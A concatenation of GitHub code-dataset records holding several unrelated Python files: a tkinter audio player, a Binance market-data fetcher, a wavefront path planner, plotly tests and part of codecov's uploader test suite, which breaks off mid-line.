(r'^accounts/login/$', 'django.contrib.auth.views.login'),\n (r'^api/', include('findcontext.api.urls')),\n (r'^', include('findcontext.main.urls')),\n)\n","repo_name":"rybesh/findcontext","sub_path":"findcontext/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1028232287","text":"\"\"\"\nPython Audio Player\n\nLibraries:\n - pyGame\n - TKInter\n\nRelevant Documentation:\n - pyGame Mixer Documentation (https://www.pygame.org/docs/ref/mixer.html)\n\n\"\"\"\n\n\"\"\"Import Modules\"\"\"\n\n\"\"\"Create Window\"\"\"\n\nimport pygame\nimport tkinter as tkr\nimport os\nplayer = tkr.Tk()\n\n\"\"\"Edit Window\"\"\"\nplayer.title(\"Audio Player\")\nplayer.geometry(\"400x540\")\n\n\n\"\"\"Playlist Register\"\"\"\nos.chdir(\"Portfolio/Music Player/album\")\nprint(os.getcwd())\nsonglist = os.listdir()\n\n\n\"\"\"Create Playlist\"\"\"\nplaylist = tkr.Listbox(player, highlightcolor=\"blue\", selectmode=tkr.SINGLE)\nprint(songlist)\nfor item in songlist:\n pos = 0\n playlist.insert(pos, item)\n pos = pos + 1\n\n\n\"\"\"Get Song\"\"\"\n#file = \"Portfolio/Music Player/Song.mp3\"\n\n\"\"\" Pygame init\"\"\"\npygame.init()\npygame.mixer.init()\n\n\n\"\"\"Action Event\"\"\"\n\n\ndef Play():\n pygame.mixer.music.load(playlist.get(tkr.ACTIVE))\n var.set(playlist.get(tkr.ACTIVE))\n pygame.mixer.music.play()\n pygame.mixer.music.set_volume(volumeLevel.get())\n print(pygame.mixer.music.get_volume())\n print(volumeLevel.get())\n\n\ndef ExitPlayer():\n pygame.mixer.music.stop()\n\n\ndef Pause():\n pygame.mixer.music.pause()\n\n\ndef UnPause():\n pygame.mixer.music.unpause()\n\n\ndef ChangeVolume(newVolume):\n pygame.mixer.music.set_volume(float(newVolume))\n\n\n\"\"\"Register Buttoms\"\"\"\nbutton1 = tkr.Button(player, width=5, height=3, text=\"PLAY\", command=Play)\nbutton2 = tkr.Button(player, width=5, height=3,\n text=\"STOP\", command=ExitPlayer)\nbutton3 = tkr.Button(player, width=5, height=3, text=\"PAUSE\", command=Pause)\nbutton4 = tkr.Button(player, width=5, height=3, text=\"UNPAUSE\", command=Pause)\n\n\n\"\"\"Song Name\"\"\"\n#contents1 = tkr.Label(player, text=file)\nvar = tkr.StringVar()\nsongtitle = tkr.Label(player, textvariable=var)\n\n\n\"\"\"Volume Input\"\"\"\nvolumeLevel = tkr.Scale(player, from_=0.0, to_=1.0,\n orient=tkr.HORIZONTAL, resolution=0.01, command=ChangeVolume)\n\n\"\"\"Place Widgets\"\"\"\nsongtitle.pack()\nbutton1.pack(fill=\"x\")\nbutton2.pack(fill=\"x\")\nbutton3.pack(fill=\"x\")\nbutton4.pack(fill=\"x\")\nvolumeLevel.pack(fill=\"x\")\nplaylist.pack(fill=\"both\", expand=\"yes\")\n\n\"\"\"Activate\"\"\"\nplayer.mainloop()\n","repo_name":"brettAI/The_Python_Learning_Experience","sub_path":"Portfolio/Music Player/pythonaudioplayer.py","file_name":"pythonaudioplayer.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29638431968","text":"from collections import deque\n\n\nn,m = map(int,input().split())\nmaze = [[] for _ in range(n)]\n\nfor i in range(n):\n s = input()\n for char in s:\n maze[i].append(int(char))\n\nprint(bfs(maze))\n","repo_name":"hongcheol/python_coding_test","sub_path":"2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18370694472","text":"import pandas as pd\nfrom ClientInfo import client\n\n\ndefault_market_data_indices = {0: 'time', 1: 'open', 2: 'high', 3: 'low', 4: 'close', 5: 'volume'}\n\nprint('Gathering ', default_market_data_indices.values())\n\ndef pull_market_data(input_dict):\n print('Pulling Market Data...')\n pulled_data = {}\n\n for current_symbol in input_dict['symbol_list']:\n current_klines_df = pd.DataFrame(client.get_historical_klines(current_symbol,\n input_dict['interval'],\n input_dict['start_str'],\n input_dict['end_str']))\n\n pulled_data[current_symbol] = create_subset_of_and_rename_kline_df(current_klines_df)\n print(current_symbol, ' Pulled')\n\n return pulled_data\n\n\ndef create_subset_of_and_rename_kline_df(current_klines_df):\n\n data_to_be_pulled_from_klines = default_market_data_indices.keys()\n\n current_asset_data = pd.DataFrame(current_klines_df[data_to_be_pulled_from_klines].rename\n (columns=default_market_data_indices))\n\n current_asset_data = format_time_and_set_cast_as_float(current_asset_data)\n\n return current_asset_data\n\n\ndef format_time_and_set_cast_as_float(data_df):\n data_df = data_df.astype('float64')\n data_df['time'] = pd.to_datetime(data_df['time']/1000, unit='s')\n return data_df\n#demo code\nif __name__ == '__main__':\n\n input_dict = {'symbol_list': ['BTCUSDT'],\n 'interval': '4h',\n 'start_str':'30 days ago',\n 'end_str':'1-25-2021'\n }\n print('Sample Code')\n print('Getting input for:\\n', input_dict)\n\n BTCUSDT_market_data = pull_market_data(input_dict)['BTCUSDT']\n print(BTCUSDT_market_data.head())\n\n\n input_dict = {'symbol_list': ['BTCUSDT', 'ETHBTC'],\n 'interval': '4h',\n 'start_str': '12-25-2020',\n 'end_str': '1-25-2021'\n }\n print('Getting input for:\\n', input_dict)\n\n market_data = pull_market_data(input_dict)\n for symbol in market_data:\n print('\\n', symbol, '\\n', market_data[symbol].head())\n\n","repo_name":"cregs08/PullMarketDataBinance","sub_path":"PullMarketDataInputDict/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35492783783","text":"from __future__ import annotations\n\nimport math\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\nimport time\n\nfrom typing import Coroutine, Tuple\nfrom typing import List\n\nshow_animation = True\n\nif show_animation:\n ax = plt.axes()\n\nclass Edge:\n def __init__(self, parent : Sphere, child : Sphere) -> None:\n self.parent = parent\n self.child = child\n\nclass Node:\n def __init__(self, x : float, y : float) -> None:\n self.x = x\n self.y = y\n\n def __str__(self) -> str:\n return str(self.x) + \", \" + str(self.y)\n\nclass Coordinate:\n def __init__(self, x : float, y : float) -> None:\n self.x = x\n self.y = y\n\nclass Sphere:\n def __init__(self, center: Coordinate, radius : float, parent: Sphere) -> None:\n self.center = center\n self.radius = radius\n self.parent = parent\n\nclass PrioritySphereQueueNode:\n def __init__(self, sphere: Sphere, priority: float) -> None:\n self.sphere = sphere\n self.priority = priority\n\ndef searchNearestFromList(sample_x : float, sample_y : float, ox : list[float], oy : list[float]) -> Tuple[int, float] :\n min_index = 0\n min_dist = np.hypot(ox[0] - sample_x, oy[0] - sample_y)\n for i in range(len(ox)):\n dist = np.hypot(ox[i] - sample_x, oy[i] - sample_y)\n if (dist < min_dist):\n min_dist = dist\n min_index = i\n\n return min_index, min_dist\n\ndef calcEuclidDistance(p1: Coordinate, p2: Coordinate) -> float:\n return math.sqrt((p1.x-p2.x)**2.0 + (p1.y-p2.y)**2.0)\n\nclass CollisionChecker(object):\n \"\"\"\n Collision checker for path planning\n \"\"\"\n def __init__(self, ox : list[float], oy :list[float], rr : float) -> None:\n \"\"\"\n ox : The list for x of obstacles\n oy : The list for y of obstacles\n rr : The thresold to determine collide with obstacles\n \"\"\"\n self.ox = ox\n self.oy = oy\n self.rr = rr\n self.max_x : float = max(ox)\n self.min_x : float = min(ox)\n self.max_y : float = max(oy)\n self.min_y : float = min(oy)\n\n def isCollision(self, p : Coordinate) -> bool:\n \"\"\"\n If there are ox or oy in radius rr, return True (colliding)\n \"\"\"\n _, min_dist = searchNearestFromList(p.x, p.y, self.ox, self.oy)\n if min_dist < self.rr: \n return True # collide\n else:\n return False # no collide\n\n def isCollisionPath(self, p0 : Coordinate, p1 : Coordinate) -> bool:\n \"\"\"\n p0, p1 : the vertexes which compromize a line\n Check collision between the line and ox, oy by rr.\n If there is collision, return True.\n \"\"\"\n dx = p1.x - p0.x\n dy = p1.y - p0.y\n yaw = math.atan2(dy, dx)\n d = np.hypot(dx, dy)\n\n D = self.rr\n n_step = round(d / D)\n\n x = p0.x\n y = p0.y\n\n for i in range(n_step):\n _, dist = searchNearestFromList(x, y, self.ox, self.oy)\n if dist <= self.rr:\n return True # collide\n x += D * math.cos(yaw)\n y += D * math.sin(yaw)\n \n return False # no collide \n\n def getNearestDistance(self, pos: Coordinate) -> float:\n max_distance = 1000000.0 # should be max...\n for x, y in zip(self.ox, self.oy):\n dist = calcEuclidDistance(Coordinate(x,y), pos)\n if (dist < max_distance):\n max_distance = dist\n return max_distance\n\ndef get_the_most_lower_priority_index(queue : List[PrioritySphereQueueNode]) -> int:\n index = 0\n prio = queue[0].priority\n for idx, node in enumerate(queue):\n if node.priority < prio:\n index = idx\n return index\n\nclass WaveFront(object):\n\n def __init__(self, collision_checker : CollisionChecker) -> None:\n self.vertexes : List[Sphere] = []\n self.edges : List[Edge] = []\n self.sphere_que : List[PrioritySphereQueueNode] = []\n self.collision_checker = collision_checker\n\n def search(self, start : Coordinate, goal : Coordinate, n: int) -> None:\n radius = self.collision_checker.getNearestDistance(start)\n sphere_node = Sphere(start, radius, None)\n self.sphere_que.append(PrioritySphereQueueNode(sphere_node, calcEuclidDistance(goal, start) - radius))\n\n while True:\n # Get the sphere which is most close to the goal\n self.sphere_que.sort(key=lambda x: x.priority, reverse=True) # sort as descending order\n #sphere_node = self.sphere_que.pop() # get last item from sorted list and remove that. Original method\n sphere_node = self.sphere_que[-1] # get last item from but doesn't remove. My method.\n self.vertexes.append(sphere_node.sphere)\n self.edges.append(Edge(sphere_node.sphere.parent, sphere_node.sphere))\n\n # Check whether is the sphere reaching the goal.\n if (calcEuclidDistance(goal, sphere_node.sphere.center) < sphere_node.sphere.radius):\n self.edges.append(Edge(sphere_node.sphere, Sphere(goal, 0, sphere_node.sphere)))\n return #Tree(V, E)\n\n # Sample n points on shpere surface\n added_counter = 0\n for i in range(n):\n theta = random.random() * 2.0 * math.pi\n qnew = Coordinate(sphere_node.sphere.center.x + sphere_node.sphere.radius * math.cos(theta),\n sphere_node.sphere.center.y + sphere_node.sphere.radius * math.sin(theta))\n is_outside = True\n # Check the sphere is not inside other spheres\n for existing_sphere in self.vertexes:\n if existing_sphere is sphere_node:\n continue\n if calcEuclidDistance(qnew, existing_sphere.center) < existing_sphere.radius:\n is_outside = False\n break\n if is_outside == False:\n continue\n new_rudius = self.collision_checker.getNearestDistance(qnew)\n if (new_rudius < 2.0): # Reject the too small sphere\n continue\n new_sphere = Sphere(qnew, new_rudius, sphere_node.sphere)\n self.sphere_que.append(PrioritySphereQueueNode(new_sphere, calcEuclidDistance(goal, qnew) - new_rudius))\n added_counter += 1\n \n # My method: If we cannot add any samples against the sphere, make priority low the sphere in order to select other sphere in next loop.\n if (added_counter == 0):\n self.sphere_que[-1].priority += self.sphere_que[-1].sphere.radius #add penalty\n\n if (len(self.sphere_que) == 0):\n print(\"sphere_que length is zero!\")\n break\n\n return\n\n def plot(self) -> None:\n for sphere in self.vertexes:\n c = patches.Circle(xy=(sphere.center.x, sphere.center.y), radius=sphere.radius, fc='g', ec='r', fill=False)\n ax.add_patch(c)\n for edge in self.edges:\n if edge.parent != None and edge.child != None:\n plt.plot([edge.parent.center.x, edge.child.center.x], [edge.parent.center.y, edge.child.center.y], 'b')\n\n\ndef main():\n #random.seed(1)\n print(\"{} start !\".format(__file__))\n\n sx = 10.0\n sy = 10.0\n gx = 50.0\n gy = 50.0\n robot_size = 5.0\n\n ox = []\n oy = []\n\n for i in range(60):\n ox.append(i)\n oy.append(0.0)\n for i in range(60):\n ox.append(60.0)\n oy.append(i)\n for i in range(61):\n ox.append(i)\n oy.append(60.0)\n for i in range(61):\n ox.append(0.0)\n oy.append(i)\n for i in range(40):\n ox.append(20.0)\n oy.append(i)\n for i in range(40):\n ox.append(40)\n oy.append(60.0 - i)\n\n if show_animation:\n plt.plot(ox, oy, \".k\")\n plt.plot(sx, sy, \"^r\")\n plt.plot(gx, gy, \"^c\")\n plt.grid(True)\n plt.axis(\"equal\")\n\n collision_checker = CollisionChecker(ox, oy, 2.0)\n wave_front_explorer = WaveFront(collision_checker)\n\n start = Coordinate(sx, sy)\n goal = Coordinate(gx, gy)\n start_time = time.perf_counter_ns()\n wave_front_explorer.search(start, goal, 3)\n elapsed = time.perf_counter_ns() - start_time\n print(\"elapsed time: {0} ms\".format(elapsed*1e-6))\n wave_front_explorer.plot()\n\n if show_animation:\n #plt.plot(rx, ry, \"-r\")\n plt.pause(0.001)\n plt.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"AriYu/myWavefront","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"39648882393","text":"import copy\n\nfrom graphics.plotly_plot import (\n PlotlyPlot,\n LAYOUT,\n TITLE,\n PLOT_AXIS,\n VISUALIZATION_TYPE,\n AGGREGATIONS,\n OPTIONS,\n AGGREGATE,\n TRANSFORMS,\n)\nimport pytest\nimport json\nimport pandas as pd\n\nfrom utility.constants import POINTS_NUM, DATA, OPTION_COL\n\nTITLE1 = \"random_num\"\nTITLE2 = \"another_rand\"\n\n\n@pytest.fixture()\ndef make_data():\n data = {\n TITLE1: [3, 6, 7],\n TITLE2: [4, 8, 1],\n }\n\n return pd.DataFrame(data)\n\n\ndef test_plotly_draw_scatter(make_data):\n plot_options = {\n DATA: [{\"type\": \"scatter\", \"x\": TITLE1, \"y\": TITLE2, \"mode\": \"markers\"}]\n }\n\n ploty_test = PlotlyPlot()\n graph_json = ploty_test.make_dict_for_html_plot(make_data, plot_options)\n graph_dict = json.loads(graph_json)\n\n assert (graph_dict[DATA][0][\"x\"] == make_data[TITLE1]).all()\n assert (graph_dict[DATA][0][\"y\"] == make_data[TITLE2]).all()\n assert graph_dict[LAYOUT][PLOT_AXIS.format(\"x\")][TITLE] == TITLE1\n assert graph_dict[LAYOUT][PLOT_AXIS.format(\"y\")][TITLE] == TITLE2\n # assert graph_dict[LAYOUT][PLOT_AXIS.format(\"x\")][AUTOMARGIN]\n # assert graph_dict[LAYOUT][PLOT_AXIS.format(\"y\")][AUTOMARGIN]\n assert len(graph_dict[DATA][0][TRANSFORMS]) == 0\n\n\ndef test_plotly_visualization_options(make_data, test_app_client_csv_backed):\n plot_options = {\n DATA: [{\"type\": \"scatter\", \"x\": TITLE1, \"y\": TITLE2, \"mode\": \"markers\"}]\n }\n ploty_test = PlotlyPlot()\n visualization_options = {\n \"hover_data\": {OPTION_COL: [TITLE1],}, # need a flask app to run\n AGGREGATE: {OPTION_COL: [TITLE2], AGGREGATIONS: {\"x\": \"avg\", \"y\": \"avg\"},},\n }\n\n graph_json = ploty_test.make_dict_for_html_plot(\n make_data, plot_options, visualization_options\n )\n graph_dict = json.loads(graph_json)\n transform_dict = graph_dict[DATA][0][TRANSFORMS]\n assert len(transform_dict) == 1\n\n assert transform_dict[0][VISUALIZATION_TYPE] == AGGREGATE\n assert transform_dict[0][AGGREGATIONS][0][\"target\"] == \"x\"\n assert transform_dict[0][AGGREGATIONS][0][\"func\"] == \"avg\"\n assert transform_dict[0][AGGREGATIONS][1][\"target\"] == \"y\"\n assert transform_dict[0][AGGREGATIONS][1][\"func\"] == \"avg\"\n","repo_name":"twosixlabs/escalation_demo","sub_path":"escalation/tests/test_plotly.py","file_name":"test_plotly.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39902646044","text":"import os\nimport sys\nimport pickle\nimport itertools\nimport zlib\nfrom ddt import ddt, data\nfrom mock import patch, Mock\nimport unittest\n\nimport subprocess\n\nimport codecov\n\n\n@ddt\nclass TestUploader(unittest.TestCase):\n maxDiff = None\n here = os.path.dirname(__file__)\n bowerrc = os.path.join(os.path.dirname(__file__), \"../.bowerrc\")\n token = os.path.join(os.path.dirname(__file__), \"../.token\")\n jacoco = os.path.join(os.path.dirname(__file__), \"../jacoco.xml\")\n filepath = os.path.join(os.path.dirname(__file__), \"coverage.xml\")\n coverage = os.path.join(os.path.dirname(__file__), \"../.coverage\")\n defaults = dict(commit=\"a\", branch=\"a\", token=\"a\")\n\n @classmethod\n def setUpClass(self):\n self._env = os.environ.copy()\n\n @classmethod\n def tearDownClass(self):\n os.environ = self._env\n\n def setUp(self):\n # set all environ back\n os.environ[\"CI\"] = \"true\"\n for key in (\n \"TRAVIS\",\n \"TRAVIS_BRANCH\",\n \"TRAVIS_COMMIT\",\n \"TRAVIS_BUILD_DIR\",\n \"TRAVIS_JOB_ID\",\n \"TRAVIS_PULL_REQUEST\",\n \"CI_NAME\",\n \"CI_BRANCH\",\n \"CI_COMMIT_ID\",\n \"SHIPPABLE\",\n \"CI_BUILD_NUMBER\",\n \"MAGNUM\",\n \"CI_COMMIT\",\n \"APPVEYOR_ACCOUNT_NAME\",\n \"APPVEYOR_PROJECT_SLUG\",\n \"APPVEYOR_PULL_REQUEST_NUMBER\",\n \"CIRCLECI\",\n \"CIRCLE_BRANCH\",\n \"CIRCLE_ARTIFACTS\",\n \"CIRCLE_SHA1\",\n \"CIRCLE_NODE_INDEX\",\n \"CIRCLE_PR_NUMBER\",\n \"SEMAPHORE\",\n \"BRANCH_NAME\",\n \"SEMAPHORE_PROJECT_DIR\",\n \"REVISION\",\n \"BUILDKITE\",\n \"BUILDKITE_BUILD_NUMBER\",\n \"BUILDKITE_JOB_ID\",\n \"BUILDKITE_BRANCH\",\n \"BUILDKITE_PROJECT_SLUG\",\n \"BUILDKITE_COMMIT\",\n \"DRONE\",\n \"DRONE_BRANCH\",\n \"DRONE_BUILD_DIR\",\n \"JENKINS_URL\",\n \"TRAVIS_TAG\",\n \"GIT_BRANCH\",\n \"GIT_COMMIT\",\n \"WORKSPACE\",\n \"BUILD_NUMBER\",\n \"CI_BUILD_URL\",\n \"SEMAPHORE_REPO_SLUG\",\n \"SEMAPHORE_CURRENT_THREAD\",\n \"DRONE_BUILD_LINK\",\n \"TRAVIS_REPO_SLUG\",\n \"CODECOV_TOKEN\",\n \"CODECOV_NAME\",\n \"APPVEYOR\",\n \"APPVEYOR_REPO_BRANCH\",\n \"APPVEYOR_BUILD_VERSION\",\n \"APPVEYOR_JOB_ID\",\n \"APPVEYOR_REPO_NAME\",\n \"APPVEYOR_REPO_COMMIT\",\n \"WERCKER_GIT_BRANCH\",\n \"WERCKER_MAIN_PIPELINE_STARTED\",\n \"WERCKER_GIT_OWNER\",\n \"WERCKER_GIT_REPOSITORY\",\n \"CI_BUILD_REF_NAME\",\n \"CI_BUILD_ID\",\n \"CI_BUILD_REPO\",\n \"CI_PROJECT_DIR\",\n \"CI_BUILD_REF\",\n \"CI_SERVER_NAME\",\n \"CI_COMMIT_REF_NAME\",\n \"CI_JOB_ID\",\n \"CI_REPOSITORY_URL\",\n \"CI_COMMIT_SHA\",\n \"ghprbActualCommit\",\n \"ghprbSourceBranch\",\n \"ghprbPullId\",\n \"WERCKER_GIT_COMMIT\",\n \"CHANGE_ID\",\n ):\n os.environ[key] = \"\"\n\n def tearDown(self):\n self.delete(self.filepath, self.coverage, self.jacoco, self.bowerrc)\n self.delete(\"hello\", \"hello.c\", \"hello.gcda\", \"hello.c.gcov\", \"hello.gcno\")\n\n def set_env(self, **kwargs):\n for key in kwargs:\n os.environ[key] = str(kwargs[key])\n\n def run_cli(self, dump=True, *args, **kwargs):\n inline = list(\n itertools.chain(\n *[[\"--%s\" % key, str(value)] for key, value in kwargs.items() if value]\n )\n )\n if dump:\n inline.append(\"--dump\")\n inline.extend(args)\n return codecov.main(*inline, debug=True)\n\n def fake_report(self):\n with open(self.filepath, \"w+\") as f:\n f.write(\"__data__\")\n\n def delete(self, *paths):\n for path in paths:\n if os.path.exists(path):\n os.remove(path)\n path = os.path.join(os.path.dirname(__file__), \"../\", path)\n if os.path.exists(path):\n os.remove(path)\n\n @data(\n \"vendor\",\n \"node_modules\",\n \"js/generated/coverage\",\n \"__pycache__\",\n \"coverage/instrumented\",\n \"build/lib\",\n \"htmlcov\",\n \".egg-info\",\n \".git\",\n \".tox\",\n \"venv\",\n \".venv-python-2.7\",\n )\n def test_ignored_path(self, path):\n self.assertTrue(\n bool(codecov.ignored_path(\"/home/ubuntu/\" + path)),\n path + \" should be ignored\",\n )\n self.assertTrue(\n bool(codecov.ignored_path(\"/home/ubuntu/\" + path + \"/more paths\")),\n path + \" should be ignored\",\n )\n\n @data(\n \"coverage.xml\",\n \"jacoco.xml\",\n \"jacocoTestResults.xml\",\n \"coverage.txt\",\n \"gcov.lst\",\n \"cov.gcov\",\n \"info.lcov\",\n \"clover.xml\",\n \"cobertura.xml\",\n \"luacov.report.out\",\n \"gcov.info\",\n \"nosetests.xml\",\n )\n def test_is_report(self, path):\n self.assertFalse(\n bool(codecov.ignored_report(\"/home/file/\" + path)),\n path + \" should not be ignored\",\n )\n self.assertTrue(\n bool(codecov.is_report(\"/home/file/\" + path)), path + \" should be a report\"\n )\n\n @data(\n \".coverage.worker10\",\n \"coverage.jade\",\n \"include.lst\",\n \"inputFiles.lst\",\n \"createdFiles.lst\",\n \"scoverage.measurements.blackandwhite.xml\",\n \"test_hello_coverage.txt\",\n \"conftest_blackwhite.c.gcov\",\n )\n def test_ignore_report(self, path):\n self.assertTrue(\n bool(codecov.ignored_report(\"/home/file/\" + path)),\n path + \" should be ignored\",\n )\n\n def test_command(self):\n try:\n self.run_cli(True, \"--help\")\n except SystemExit as e:\n self.assertEqual(str(e), \"0\")\n else:\n raise Exception(\"help not shown\")\n\n def test_exits_0(self):\n try:\n sys.argv = [\"\"]\n codecov.main()\n except SystemExit as e:\n self.assertEqual(str(e), \"0\")\n else:\n raise Exception(\"did not exit\")\n\n def test_exits_1(self):\n try:\n sys.argv = [\"\"]\n codecov.main(\"--required\")\n except SystemExit as e:\n self.assertEqual(str(e), \"1\")\n else:\n raise Exception(\"did not exit\")\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_returns_none(self):\n with patch(\"requests.post\") as post:\n with patch(\"requests.put\") as put:\n post.return_value = Mock(status_code=200, text=\"target\\ns3\")\n put.return_value = Mock(status_code=200)\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n sys.argv = [\n \"\",\n \"--commit=8ed84d96bc225deff66605486180cd555366806b\",\n \"--branch=master\",\n \"--token=473c8c5b-10ee-4d83-86c6-bfd72a185a27\",\n ]\n self.assertEqual(codecov.main(), None)\n assert post.called and put.called\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_send(self):\n with patch(\"requests.post\") as post:\n with patch(\"requests.put\") as put:\n post.return_value = Mock(status_code=200, text=\"target\\ns3\")\n put.return_value = Mock(status_code=200)\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n res = self.run_cli(\n False, commit=\"a\" * 40, branch=\"master\", token=\"\"\n )\n self.assertEqual(res[\"result\"].strip(), \"target\")\n assert \"https://codecov.io/upload/v4?\" in post.call_args[0][0]\n assert (\n \"commit=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\n in post.call_args[0][0]\n )\n assert \"token=%3Ctoken%3E\" in post.call_args[0][0]\n assert \"branch=master\" in post.call_args[0][0]\n gzip_worker = zlib.decompressobj(zlib.MAX_WBITS | 16)\n reports = (\n gzip_worker.decompress(put.call_args[1][\"data\"])\n + gzip_worker.flush()\n )\n assert \"tests/test.py\".encode(\"utf-8\") in reports\n\n def test_send_error(self):\n with patch(\"requests.post\") as post:\n post.return_value = Mock(status_code=400, text=\"error\")\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n try:\n self.run_cli(\n False, token=\"not-a-token\", commit=\"a\" * 40, branch=\"master\"\n )\n except Exception:\n pass\n else:\n raise Exception(\"400 never raised\")\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_read_token_file(self):\n with open(self.token, \"w+\") as f:\n f.write(\"a\")\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n res = self.run_cli(token=\"@\" + self.token, commit=\"a\", branch=\"b\")\n self.assertIn(\"token=a\", res[\"urlargs\"])\n\n def test_bowerrc(self):\n with open(self.bowerrc, \"w+\") as f:\n f.write('{\"directory\": \"tests\"}')\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n try:\n self.run_cli(**self.defaults)\n except AssertionError as e:\n self.assertEqual(str(e), \"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n def test_disable_search(self):\n self.fake_report()\n try:\n self.run_cli(disable=\"search\", token=\"a\", branch=\"b\", commit=\"c\")\n except AssertionError as e:\n self.assertEqual(str(e), \"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_prefix(self):\n self.fake_report()\n res = self.run_cli(\n prefix=\"/foo/bar/\", dump=True, token=\"a\", branch=\"b\", commit=\"c\"\n )\n assert \"\\nfoo/bar/.gitignore\" in res[\"reports\"]\n\n def write_c(self):\n c = \"\\n\".join(\n (\n \"#include \",\n \"static int t = 1;\" \"int main()\",\n \"{\",\n \"if (t)\",\n 'printf(\"on this line\\\\n\");',\n \"else\",\n 'printf(\"but not here\\\\n\");',\n \"return 0;\",\n \"}\",\n )\n )\n with open(os.path.join(os.path.dirname(__file__), \"../hello.c\"), \"w+\") as f:\n f.write(c)\n codecov.try_to_run(\n [\"clang\", \"-coverage\", \"-O0\", \"hello.c\", \"-o\", \"hello\", \"&&\", \"./hello\"]\n )\n\n def test_disable_gcov(self):\n if self._env.get(\"TRAVIS\") == \"true\":\n self.write_c()\n try:\n self.run_cli(disable=\"gcov\", token=\"a\", branch=\"b\", commit=\"c\")\n except AssertionError as e:\n self.assertEqual(os.path.exists(\"hello.c.gcov\"), False)\n self.assertEqual(str(e), \"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n else:\n self.skipTest(\"Skipped, works on Travis only.\")\n\n def test_gcov(self):\n self.skipTest(\"Need to fix this test...\")\n # if self._env.get('TRAVIS') == 'true':\n # self.write_c()\n # output = self.run_cli(token='a', branch='b', commit='c')\n # self.assertEqual(os.path.exists('hello.c.gcov'), True)\n # report = output['reports'].split('<<<<<< network\\n')[1].splitlines()\n # self.assertIn('hello.c.gcov', report[0])\n # else:\n # self.skipTest(\"Skipped, works on Travis only.\")\n\n def test_disable_detect(self):\n self.set_env(\n JENKINS_URL=\"a\",\n GIT_BRANCH=\"b\",\n GIT_COMMIT=\"c\",\n CODECOV_TOKEN=\"d\",\n CODECOV_NAME=\"e\",\n )\n self.fake_report()\n try:\n self.run_cli(disable=\"detect\")\n except AssertionError as e:\n self.assertEqual(\n str(e), \"Commit sha is missing. Please specify via --commit=:sha\"\n )\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_bowerrc_none(self):\n with open(self.bowerrc, \"w+\") as f:\n f.write('{\"other_key\": \"tests\"}')\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n res = self.run_cli(**self.defaults)\n self.assertIn(\"tests/test.py\", res[\"reports\"])\n\n @unittest.skipIf(\n os.getenv(\"CI\") == \"True\" and os.getenv(\"APPVEYOR\") == \"True\",\n \"Skip AppVeyor CI test\",\n )\n def test_discovers(self):\n with open(self.jacoco, \"w+\") as f:\n f.write(\"\")\n with open(self.filepath, \"w+\") as f:\n f.write(\"coverage data\")\n res = self.run_cli(**self.defaults)\n self.assertIn(\"coverage.xml\", res[\"reports\"])\n self.assertIn(\"coverage data\", res[\"reports\"])\n self.assertIn(\"jacoco.xml\", res[\"reports\"])\n self.assertIn(\"\", res[\"reports\"])\n\n def test_not_jacoco(self):\n with open(self.filepath, \"w+\") as f:\n f.write(\"\")\n res = self.run_cli(file=\"tests/coverage.xml\", **self.defaults)\n res = res[\"reports\"].split(\"<<<<<< network\\n\")[1].splitlines()\n self.assertEqual(res[0], \"# path=tests/coverage.xml\")\n self.assertEqual(res[1], \"\")\n\n def test_run_coverage(self):\n self.skipTest(\"Not sure how to pull off atm\")\n with open(self.coverage, \"w+\") as f:\n f.write(pickle.dumps())\n res = self.run_cli(**self.defaults)\n self.assertIn('', res[\"reports\"])\n\n def test_run_coverage_fails(self):\n with open(self.coverage, \"w+\") as f:\n f.write(\"bad data\")\n try:\n self.run_cli(**self.defaults)\n except AssertionError as e:\n self.assertEqual(str(e), \"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n def test_include_env(self):\n self.set_env(HELLO=\"WORLD\")\n self.fake_report()\n res = self.run_cli(env=\"HELLO\", file=self.filepath, **self.defaults)\n self.assertIn(\"HELLO=WORLD\", res[\"reports\"])\n\n def test_none_found(self):\n try:\n self.run_cli(**self.defaults)\n except AssertionError as e:\n self.assertEqual(str(e), 